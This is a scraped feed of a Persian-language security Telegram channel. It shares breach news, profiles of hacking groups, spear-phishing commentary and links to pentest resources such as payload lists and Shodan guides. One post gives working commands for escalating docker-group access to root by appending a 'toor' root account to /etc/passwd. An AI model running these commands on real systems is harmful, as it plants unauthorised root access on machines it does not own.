اطلاعات ۲۰ هزار کاربر اپلیکیشن موبایلی Air Canada توسط هکرها مورد نفوذ قرار گرفت.
این رقم در حال زیاد شدن بود و هکر ناشناس قصد داشت وارد حسابهای بیشتری شود که با مشاهده لاگین های مشکوک، کارشناسان ایر کانادا حسابها را قفل و روند پیشرفت این هکر یا هکرها را متوقف کرده اند.
https://www.bleepingcomputer.com/news/security/air-canada-mobile-app-users-affected-by-data-breach/
#news
#breach
#canada
@sec_nerd
این رقم در حال زیاد شدن بود و هکر ناشناس قصد داشت وارد حسابهای بیشتری شود که با مشاهده لاگین های مشکوک، کارشناسان ایر کانادا حسابها را قفل و روند پیشرفت این هکر یا هکرها را متوقف کرده اند.
https://www.bleepingcomputer.com/news/security/air-canada-mobile-app-users-affected-by-data-breach/
#news
#breach
#canada
@sec_nerd
BleepingComputer
Air Canada Mobile App Users Affected By Data Breach
Air Canada informed today 20,000 of its mobile app users that information listed under their profile may have been accessed without authorization.
Out of Band Exploitation (OOB) CheatSheet
https://www.notsosecure.com/oob-exploitation-cheatsheet/
#oob
#web
#pentest
#must_read
@sec_nerd
https://www.notsosecure.com/oob-exploitation-cheatsheet/
#oob
#web
#pentest
#must_read
@sec_nerd
لیستی از آسیب پذیری های وب اپلیکیشن ها و روش های اکسپلویت کردن و دور زدن محدودیت ها
https://github.com/swisskyrepo/PayloadsAllTheThings
#web
#pentest
#exploit
@sec_nerd
https://github.com/swisskyrepo/PayloadsAllTheThings
#web
#pentest
#exploit
@sec_nerd
GitHub
GitHub - swisskyrepo/PayloadsAllTheThings: A list of useful payloads and bypass for Web Application Security and Pentest/CTF
A list of useful payloads and bypass for Web Application Security and Pentest/CTF - swisskyrepo/PayloadsAllTheThings
معرفی گروه هکرهای زیرزمینی Cobalt
این گروه برای نخستین بار در سال ۲۰۱۶ با سرقت پول نقد از دستگاه های خودپرداز با روش jackpotting شناسایی شد.
روش jackpotting با آلوده سازی دستگاه خودپرداز به بدافزار صورت میپذیرد.
گروه کبالت بصورت تخصصی سیستم های پرداخت، بانکها و سازمانهای تجاری را هدف قرار میدهد و این اهداف تاکنون در ۱۵ کشور قرار داشته اند.
در سال ۲۰۱۶ این هکرها تعداد زیادی ATM را در اروپا بصورت ریموت آلوده کردند. کشورهایی نظیر انگلیس، روسیه،رومانی، هلند، اسپانیا و ... از قربانیان این حمله بودند.
این بدافزار که بنظر میرسد ساخت گروه Buhtrap ATM gang باشد تنها از بانکهای روسیه، طی سالهای ۲۰۱۵ و ۲۰۱۶ مبلغ ۲۸ میلیون دلار سرقت کرد!
سال گذشته هکرهای کبالت با استفاده از آسیب پذیری CVE-2017-11882 که مربوط به آفیس بود و در تمامی نسخه های ویندوز کار میکرد، اقدام به ارسال ایمیل های فیشینگ و الصاق داکیومنتهای آلوده RTF و آلوده سازی اهداف خود کردند.
آنها در سال ۲۰۱۷ یک زنجیره تامین را در روسیه آلوده کردند. آنها همچنین از نسخه دستکاری شده باج افزار #petya برای پاک کردن ردپاهای خود استفاده میکردند.
در سال ۲۰۱۸ این هکرها بیکار نبودند و بازهم با هدف قراردادن کارمندان بانکها با حملات فیشینگ، سیستم های بانکی را آلوده کردند. آنها در طی یک عملیات دو ماهه موفق شدند مبلغ ۶۰۰ هزار دلار از بانکهای قزاقستان سرقت کنند.
در ماه آگوست نیز کبالت، دو بانک را در روسیه و رومانی مورد هدف قرار داد. در این حمله آنها از بکدورهای جاوا اسکریپتی استفاده کردند. در گامهای بعدی این بکدور اقدام به اتصال به دامینهای مختلف و دانلود فایلهای آپدیت و بدافزارهای دیگر میکند.
https://securityaffairs.co/wordpress/75793/cyber-crime/cobalt-campaign-russia-romania.html
#cobalt
#banking
#malware
#russia
#usa
#jackpotting
@sec_nerd
این گروه برای نخستین بار در سال ۲۰۱۶ با سرقت پول نقد از دستگاه های خودپرداز با روش jackpotting شناسایی شد.
روش jackpotting با آلوده سازی دستگاه خودپرداز به بدافزار صورت میپذیرد.
گروه کبالت بصورت تخصصی سیستم های پرداخت، بانکها و سازمانهای تجاری را هدف قرار میدهد و این اهداف تاکنون در ۱۵ کشور قرار داشته اند.
در سال ۲۰۱۶ این هکرها تعداد زیادی ATM را در اروپا بصورت ریموت آلوده کردند. کشورهایی نظیر انگلیس، روسیه،رومانی، هلند، اسپانیا و ... از قربانیان این حمله بودند.
این بدافزار که بنظر میرسد ساخت گروه Buhtrap ATM gang باشد تنها از بانکهای روسیه، طی سالهای ۲۰۱۵ و ۲۰۱۶ مبلغ ۲۸ میلیون دلار سرقت کرد!
سال گذشته هکرهای کبالت با استفاده از آسیب پذیری CVE-2017-11882 که مربوط به آفیس بود و در تمامی نسخه های ویندوز کار میکرد، اقدام به ارسال ایمیل های فیشینگ و الصاق داکیومنتهای آلوده RTF و آلوده سازی اهداف خود کردند.
آنها در سال ۲۰۱۷ یک زنجیره تامین را در روسیه آلوده کردند. آنها همچنین از نسخه دستکاری شده باج افزار #petya برای پاک کردن ردپاهای خود استفاده میکردند.
در سال ۲۰۱۸ این هکرها بیکار نبودند و بازهم با هدف قراردادن کارمندان بانکها با حملات فیشینگ، سیستم های بانکی را آلوده کردند. آنها در طی یک عملیات دو ماهه موفق شدند مبلغ ۶۰۰ هزار دلار از بانکهای قزاقستان سرقت کنند.
در ماه آگوست نیز کبالت، دو بانک را در روسیه و رومانی مورد هدف قرار داد. در این حمله آنها از بکدورهای جاوا اسکریپتی استفاده کردند. در گامهای بعدی این بکدور اقدام به اتصال به دامینهای مختلف و دانلود فایلهای آپدیت و بدافزارهای دیگر میکند.
https://securityaffairs.co/wordpress/75793/cyber-crime/cobalt-campaign-russia-romania.html
#cobalt
#banking
#malware
#russia
#usa
#jackpotting
@sec_nerd
Security Affairs
Cobalt cybercrime gang targets Russian and Romanian banks
On August 13, ASERT observed the Cobalt crime gang actively pushing a new campaign aimed at institutions in eastern Europe and Russia.
در لینک زیر خواهید دید چگونه میتوان با استفاده از موتور جستجوی shodan و یافتن دستگاههای Dreambox (دریم باکس شرکت تولید کننده رسیور و ست تاپ باکس است) در نهایت با توجه به وجود آسیب پذیری در این دستگاهها، قادر به اجرای دستور با سطح دسترسی روت خواهید بود.
https://the-infosec.com/2017/07/05/from-shodan-to-rce-opendreambox-2-0-0-code-execution/
#shodan
#iot
#rce
#dreambox
#pentest
@sec_nerd
https://the-infosec.com/2017/07/05/from-shodan-to-rce-opendreambox-2-0-0-code-execution/
#shodan
#iot
#rce
#dreambox
#pentest
@sec_nerd
Alfie Njeru
From Shodan to Remote Code Execution #2 – hacking OpenDreambox 2.0.0
A sequel to the last post of what is now becoming a series of “From Shodan to remote code execution”, we now take a look at how to hack misconfigured Dreambox installations. Dreambox is…
اگر به یک سیستم لینوکسی دسترسی دارید و id کاربر شما نشان میدهد که شما عضو گروه docker نیز هستید، میتوانید با دستورات زیر سطح دسترسی خود را در کانتینرها به روت افزایش دهید:
$> docker run -it --rm -v $PWD:/mnt bash
دستور زیر حسابی با نام کاربری toor و پسورد password اضافه خواهد کرد:
#> echo 'toor:$1$.ZcF5ts0$i4k6rQYzeegUkacRCvfxC0:0:0:root:/root:/bin/sh' >> /mnt/etc/passwd
#docker
#linux
#privesc
#trick
@sec_nerd
$> docker run -it --rm -v $PWD:/mnt bash
دستور زیر حسابی با نام کاربری toor و پسورد password اضافه خواهد کرد:
#> echo 'toor:$1$.ZcF5ts0$i4k6rQYzeegUkacRCvfxC0:0:0:root:/root:/bin/sh' >> /mnt/etc/passwd
#docker
#linux
#privesc
#trick
@sec_nerd
گزارشات امریکایی ها نشان میدهد که روسها در حال فعالیت بر روی نقاط ضعف این کشور برای تاثیرگذاری بر روی انتخابات میان دوره ای هستند.
روش اصلی بکار گرفته شده توسط روسها spear phishing است که در آن ایمیلهایی حاوی لینکهایی به وبسایتهای جعلی قرار دارد. روسها با این روش موفق شدند کمیته ملی دموکراتها را پیش از این هک کنند.
با توجه به انتشار عمومی بدافزارهایی که از آژانس های اطلاعاتی دزدیده شده اند، حال هکرها میتوانند به راحتی اطلاعات ارزشمند و حجیمی را از افراد سرقت کنند. تنها هفته پیش مایکروسافت ۶ دامنه جعلی را که گویا توسط روسها رجیستر شده بودند بلاک کرد.
به لطف جهانی سازی نام دامنه ها، حالا به هر زبانی میتوان دامنه ساخت و این به هکرها کمک میکند تا با استفاده از علائم خاص (homoglyphs) و گول زننده دامین های جعلی ای ثبت کنند که تشخیص آن در نگاه اول حتی برای کارشناسان امنیت و اینترنت نیز آسان نیست. (نمونه این مورد را در تبلیغ تلگرامی آدیداس و بی ام و دیده اید)
داستان زمانی تلخ تر میشود که این دامین های جعلی با گواهینامه های دیجیتال (https) اعتمادسازی بی نظیری را در قربانی خود ایجاد میکنند. برای مثال تنها در سال گذشته ۱۵ هزار وبسایت ترکیبی از نام paypal را داشتند و گواهینامه دیجیتال دریافت کرده بودند.
بنظر میرسد بکارگیری یک چارچوب شفافیت برای تشخیص اعتبار گواهینامه های دیجیتال و حتی نام دامنه ها و صفحات شبکه های اجتماعی الزامی میباشد.
در نهایت آموزش افراد بسیار حائز اهمیت بوده و باید در اولویت قرار گیرد.
منبع:
https://edition.cnn.com/2018/09/01/opinions/spear-phishing-has-become-even-more-dangerous-opinion-vishwanath/index.html
#news
#usa
#russia
#iran
#electron
#dnc
#spear_phishing
@sec_nerd
روش اصلی بکار گرفته شده توسط روسها spear phishing است که در آن ایمیلهایی حاوی لینکهایی به وبسایتهای جعلی قرار دارد. روسها با این روش موفق شدند کمیته ملی دموکراتها را پیش از این هک کنند.
با توجه به انتشار عمومی بدافزارهایی که از آژانس های اطلاعاتی دزدیده شده اند، حال هکرها میتوانند به راحتی اطلاعات ارزشمند و حجیمی را از افراد سرقت کنند. تنها هفته پیش مایکروسافت ۶ دامنه جعلی را که گویا توسط روسها رجیستر شده بودند بلاک کرد.
به لطف جهانی سازی نام دامنه ها، حالا به هر زبانی میتوان دامنه ساخت و این به هکرها کمک میکند تا با استفاده از علائم خاص (homoglyphs) و گول زننده دامین های جعلی ای ثبت کنند که تشخیص آن در نگاه اول حتی برای کارشناسان امنیت و اینترنت نیز آسان نیست. (نمونه این مورد را در تبلیغ تلگرامی آدیداس و بی ام و دیده اید)
داستان زمانی تلخ تر میشود که این دامین های جعلی با گواهینامه های دیجیتال (https) اعتمادسازی بی نظیری را در قربانی خود ایجاد میکنند. برای مثال تنها در سال گذشته ۱۵ هزار وبسایت ترکیبی از نام paypal را داشتند و گواهینامه دیجیتال دریافت کرده بودند.
بنظر میرسد بکارگیری یک چارچوب شفافیت برای تشخیص اعتبار گواهینامه های دیجیتال و حتی نام دامنه ها و صفحات شبکه های اجتماعی الزامی میباشد.
در نهایت آموزش افراد بسیار حائز اهمیت بوده و باید در اولویت قرار گیرد.
منبع:
https://edition.cnn.com/2018/09/01/opinions/spear-phishing-has-become-even-more-dangerous-opinion-vishwanath/index.html
#news
#usa
#russia
#iran
#electron
#dnc
#spear_phishing
@sec_nerd
CNN
Spear phishing has become even more dangerous
Arun Vishwanath says Russian hackers can take advantage of several weaknesses of procedures on the Internet, and the vulnerabilities are growing worse
👍1
امنیت اطلاعات
هفت نکته برای آغاز کار با موتور جستجوی اینترنت اشیاء shodan: ۱- درک bannerها: باید بدانید که هر پورت که نماینده یک سرویس است، اغلب اطلاعاتی را از سرویس مربوطه نمایش میدهد، این اطلاعات میتواند شامل نسخه سرویس و پلتفرم باشد. صاحبان سرورها میتوانند برای گول…
نمونه هایی از برخی نام های کاربری و پسوردهای پیش فرض در دستگاهها که میتوان با استفاده از موتور جستجوی اینترنت اشیاء shodan یافت
(مربوط به بند ۶ پست ریپلای شده)
https://www.behindthefirewalls.com/2013/04/hakcking-with-default-credentials-and.html
#shodan
#network
#pentest
@sec_nerd
(مربوط به بند ۶ پست ریپلای شده)
https://www.behindthefirewalls.com/2013/04/hakcking-with-default-credentials-and.html
#shodan
#network
#pentest
@sec_nerd
Behindthefirewalls
Hakcking with default credentials and Shodan
Do you think that the personal from the IT department have default password in their equipments of a production environment? The answer is....
تکنیک های استفاده از آسیب پذیری SSRF در php
https://medium.com/secjuice/php-ssrf-techniques-9d422cb28d51
#php
#web
#pentest
#ssrf
@sec_nerd
https://medium.com/secjuice/php-ssrf-techniques-9d422cb28d51
#php
#web
#pentest
#ssrf
@sec_nerd
Medium
PHP SSRF Techniques
How to bypass filter_var(), preg_match() and parse_url()
محققان دانشگاهی در سوئد و انگلیس موفق شدند با استفاده از اسپیکرهای گوشی های همراه پترن های بازگشایی را بدست آورند.
ایده اصلی در این روش SonarSnoop نام دارد و موقعیت انگشت کاربر را بر روی صفحه دنبال میکند.
این تکنیک از یک برنامه جاسوس که امواج صوتی را از اسپیکرهای پایین و بالای گوشی ، در فرکانسهایی که قابل شنیدن نیست (بین ۱۸ تا ۲۰ کیلوهرتز) منتشر میکند، بهره میبرد.
سپس برنامه با دریافت انعکاس امواج منتشر شده، پس از برخورد با اشیاء نزدیک، که در این مورد انگشت کاربر است، دیتا را جمع آوری کرده و با استفاده از تکنیک های یادگیری ماشین پترن های ممکن برای بازگشایی گوشی را حدس میزند.
روش مذکور بر روی گوشی سامسونگ گلکسی اس ۴ با ورژن اندروید 5.0.1 آزمایش شده است.
ایده SonarSnoop هنوز در ابتدای راه است و برای کامل شدن نیاز به زمان دارد. ایده اولیه این طرح از FingerIO گرفته شده است. این ایده برای بهبود عملکرد ساعت های هوشمند بکار رفت بطوری که کاربر میتواند با کشیدن خطوط بر روی دست خود در نزدیکی ساعت هوشمند، پیامی را به ساعت ارسال کند که این پیام نوعی برقراری ارتباط غیرمستقیم با صفحه لمسی آن می باشد.
لینک مقاله منتشر شده:
https://arxiv.org/pdf/1808.10250v1.pdf
لینک خبر:
https://www.zdnet.com/article/sonarsnoop-attack-can-steal-smartphone-unlock-patterns/
#android
#iphone
#sonar
#misc
@sec_nerd
ایده اصلی در این روش SonarSnoop نام دارد و موقعیت انگشت کاربر را بر روی صفحه دنبال میکند.
این تکنیک از یک برنامه جاسوس که امواج صوتی را از اسپیکرهای پایین و بالای گوشی ، در فرکانسهایی که قابل شنیدن نیست (بین ۱۸ تا ۲۰ کیلوهرتز) منتشر میکند، بهره میبرد.
سپس برنامه با دریافت انعکاس امواج منتشر شده، پس از برخورد با اشیاء نزدیک، که در این مورد انگشت کاربر است، دیتا را جمع آوری کرده و با استفاده از تکنیک های یادگیری ماشین پترن های ممکن برای بازگشایی گوشی را حدس میزند.
روش مذکور بر روی گوشی سامسونگ گلکسی اس ۴ با ورژن اندروید 5.0.1 آزمایش شده است.
ایده SonarSnoop هنوز در ابتدای راه است و برای کامل شدن نیاز به زمان دارد. ایده اولیه این طرح از FingerIO گرفته شده است. این ایده برای بهبود عملکرد ساعت های هوشمند بکار رفت بطوری که کاربر میتواند با کشیدن خطوط بر روی دست خود در نزدیکی ساعت هوشمند، پیامی را به ساعت ارسال کند که این پیام نوعی برقراری ارتباط غیرمستقیم با صفحه لمسی آن می باشد.
لینک مقاله منتشر شده:
https://arxiv.org/pdf/1808.10250v1.pdf
لینک خبر:
https://www.zdnet.com/article/sonarsnoop-attack-can-steal-smartphone-unlock-patterns/
#android
#iphone
#sonar
#misc
@sec_nerd
ZDNet
SonarSnoop attack can steal smartphone unlock patterns
SonarSnoop technique transforms smartphones into mini sonar systems to track a user's finger across the screen and steal phone unlock patterns.
امنیت اطلاعات
سلام خدمت دوستان عزیز احتمالا شما هم با این افراد در فضای سایبری برخورد کردید که یا هنرمند هستن یا ورزشکار و یا جزو افراد مشهور در فضای مجازی به حساب میان و امنیت پیج اینستاگرامشون رو سپردن به فردی و با عنوان «آقای ایکس مسئول امنیت پیج» و یا عناوین مشابه،…
نابغه جهانی که مسئول امنیت پیج رابعه اسکویی شده بود متاسفانه از عهده مسئولیتش برنیومد . پست بعدی رو ببینید!
#instagram
#con_man
@sec_nerd
#con_man
@sec_nerd
امنیت اطلاعات
نابغه جهانی که مسئول امنیت پیج رابعه اسکویی شده بود متاسفانه از عهده مسئولیتش برنیومد . پست بعدی رو ببینید! #instagram #con_man @sec_nerd
This media is not supported in your browser
VIEW IN TELEGRAM
البته فیلم ۱۰۰ درصد قابل اطمینان نیست اما بدونید در حقیقت هم این نوابغ اینستاگرامی در همین حدن!
#instagram
@sec_nerd
@sec_nerd